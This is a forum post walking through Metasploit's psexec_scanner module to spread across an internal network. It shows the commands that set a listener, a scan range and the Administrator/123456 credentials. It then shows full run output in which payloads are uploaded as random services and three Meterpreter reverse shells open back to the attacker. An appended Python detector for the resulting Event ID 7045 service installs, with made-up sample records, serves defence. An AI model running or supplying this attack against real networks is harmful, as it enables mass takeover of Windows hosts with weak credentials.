Metasploit: batch psexec
Posted on 2012-10-3 20:13:11
Works well on an internal network.
Code: see https://github.com/darkoperator/ ... b/psexec_scanner.rb
After downloading it, save it to msfpath/modules/auxiliary/scanner/smb/, then launch MSF, load the module and view its options.
msf > use auxiliary/scanner/smb/psexec_scanner
msf  auxiliary(psexec_scanner) > show options

Module options (auxiliary/scanner/smb/psexec_scanner):

   Name       Current Setting                  Required  Description
   ----       ---------------                  --------  -----------
   HANDLER    true                             no        Start an Exploit Multi Handler to receive the connection
   LHOST                                       yes       Local Hosts for payload to connect.
   LPORT                                       yes       Local Port for payload to connect.
   OPTIONS                                     no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD    windows/meterpreter/reverse_tcp  yes       Payload to use against Windows host
   RHOSTS                                      yes       Range of hosts to scan.
   SHARE      ADMIN$                           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP                        yes       SMB Domain
   SMBPass                                     no        SMB Password
   SMBUser                                     no        SMB Username
   THREADS    1                                yes       The number of concurrent threads
   TYPE       manual                           no        Type of credentials to use, manual for provided one, db for those found on the database (accepted: db, manual)

msf  auxiliary(psexec_scanner) >

Then set the local IP, the listening port, the IP range to scan, and the account and password, and that's it. The range I want to scan is 192.1.1.0-20.
msf  auxiliary(psexec_scanner) > set LHOST 192.1.1.100
LHOST => 192.1.1.100
msf  auxiliary(psexec_scanner) > set LPORT 5559
LPORT => 5559
msf  auxiliary(psexec_scanner) > set RHOSTS 192.1.1.0-20
RHOSTS => 192.1.1.0-20
msf  auxiliary(psexec_scanner) > set SMBUser Administrator
SMBUser => Administrator
msf  auxiliary(psexec_scanner) > set SMBPass 123456
SMBPass => 123456
msf  auxiliary(psexec_scanner) >

Run it and wait for the scan to finish; it automatically listens for the reverse shell.
msf  auxiliary(psexec_scanner) > exploit

[*] Using the username and password provided
[*] Starting exploit multi handler
[*] Started reverse handler on 192.1.1.100:5559
[*] Starting the payload handler...
[*] 192.1.1.2:445 - TCP OPEN
[*] Trying Administrator:123456
[*] Connecting to the server...
[*] Authenticating to 192.1.1.2:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \MILJpiMz.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.2[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.2[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (rImNsjHA - "MtyVQGxQDbMmLhIaxkoqiDLNAplPz")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \MILJpiMz.exe...
[*] Sending stage (752128 bytes) to 192.1.1.2
[*] Meterpreter session 1 opened (192.1.1.100:5559 -> 192.1.1.2:1035) at 2011-12-21 16:32:04 +0800
[*] Scanned 03 of 21 hosts (014% complete)
[*] 192.1.1.4:445 - TCP OPEN
[*] Trying Administrator:123456
[*] Connecting to the server...
[*] Authenticating to 192.1.1.4:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \mzYtShgr.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.4[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.4[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (HvhoAGic - "MsHkGoBGjPcTPGe")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \mzYtShgr.exe...
[*] Sending stage (752128 bytes) to 192.1.1.4
[*] Meterpreter session 2 opened (192.1.1.100:5559 -> 192.1.1.4:1032) at 2011-12-21 16:32:13 +0800
[*] Scanned 05 of 21 hosts (023% complete)
[*] 192.1.1.5:445 - TCP OPEN
[*] Trying Administrator:123456
[*] Connecting to the server...
[*] Authenticating to 192.1.1.5:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \LtIwIjvR.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.5[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.5[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (fgFnEbVq - "MDVUyyTfgE")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \LtIwIjvR.exe...
[*] Sending stage (752128 bytes) to 192.1.1.5
[*] Meterpreter session 3 opened (192.1.1.100:5559 -> 192.1.1.5:1035) at 2011-12-21 16:32:22 +0800
[*] Scanned 07 of 21 hosts (033% complete)
[*] Scanned 09 of 21 hosts (042% complete)
[*] Scanned 11 of 21 hosts (052% complete)
[*] Scanned 13 of 21 hosts (061% complete)
[*] Scanned 15 of 21 hosts (071% complete)
[*] Scanned 17 of 21 hosts (080% complete)
[*] Scanned 19 of 21 hosts (090% complete)
[*] Scanned 21 of 21 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(psexec_scanner) >

It runs really well; it found 3.

Only after playing a thousand pieces does one understand music; only after examining a thousand swords does one know a blade.
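Added example, not part of the original post or of the module: each hit in the run above leaves the same trace on the target, a service with a random 8-letter name and a random display name whose binary is an 8-letter .exe written through ADMIN$ (the Windows directory), started and then removed. On a Windows host that shows up as a "service installed" record in the System log (Event ID 7045), which is the defender's hook. The Python below flags such records; the pipe-delimited record layout, the sample records and the looks_random heuristic are all constructed assumptions of this example.

```python
import re

# Constructed sample of Windows System log "service installed" records
# (Event ID 7045), flattened to one line each as
#   event_id|service name|display name|image path
# The first three mimic what the scanner run above leaves on a host: ADMIN$ is
# the Windows directory, so the dropped 8-letter .exe lands in %SYSTEMROOT%.
# The rest are ordinary service installs included as negatives, plus one
# non-7045 event to show it is ignored. The layout is assumed, not a real export.
SAMPLE_7045 = """\
7045|rImNsjHA|MtyVQGxQDbMmLhIaxkoqiDLNAplPz|%SYSTEMROOT%\\MILJpiMz.exe
7045|HvhoAGic|MsHkGoBGjPcTPGe|%SYSTEMROOT%\\mzYtShgr.exe
7045|fgFnEbVq|MDVUyyTfgE|%SYSTEMROOT%\\LtIwIjvR.exe
7045|Spooler|Print Spooler|%SystemRoot%\\System32\\spoolsv.exe
7045|gupdate|Google Update Service|"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe" /svc
7036|Spooler|Print Spooler|
"""

RANDOM_NAME = re.compile(r"^[A-Za-z]{8}$")
# Binary dropped straight into the Windows directory: 8 random letters + .exe
ROOT_EXE = re.compile(r"^%SYSTEMROOT%\\[A-Za-z]{8}\.exe$", re.IGNORECASE)


def looks_random(word):
    """Heuristic for a randomly generated mixed-case string: real display
    names rarely flip case every couple of letters."""
    flips = sum(1 for a, b in zip(word, word[1:]) if a.isupper() != b.isupper())
    return flips >= len(word) // 3


def parse_7045(text):
    """Keep only the 7045 (service installed) records, as dicts."""
    records = []
    for line in text.splitlines():
        event_id, name, display, path = line.split("|", 3)
        if event_id == "7045":
            records.append({"name": name, "display": display, "path": path})
    return records


def flag_psexec_like(records):
    """Return the service names whose install matches the pattern seen above:
    8-letter random service name, random display name, and a binary written
    directly into %SYSTEMROOT% (what an upload to ADMIN$ produces)."""
    return [
        r["name"] for r in records
        if RANDOM_NAME.match(r["name"])
        and ROOT_EXE.match(r["path"])
        and looks_random(r["display"])
    ]


if __name__ == "__main__":
    for name in flag_psexec_like(parse_7045(SAMPLE_7045)):
        print("suspicious service install:", name)
```

The service is deleted seconds after it starts, so the 7045 record (and the matching 7036 start/stop pair) is usually the only durable artifact; forwarding System logs off the host is what makes this check useful.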
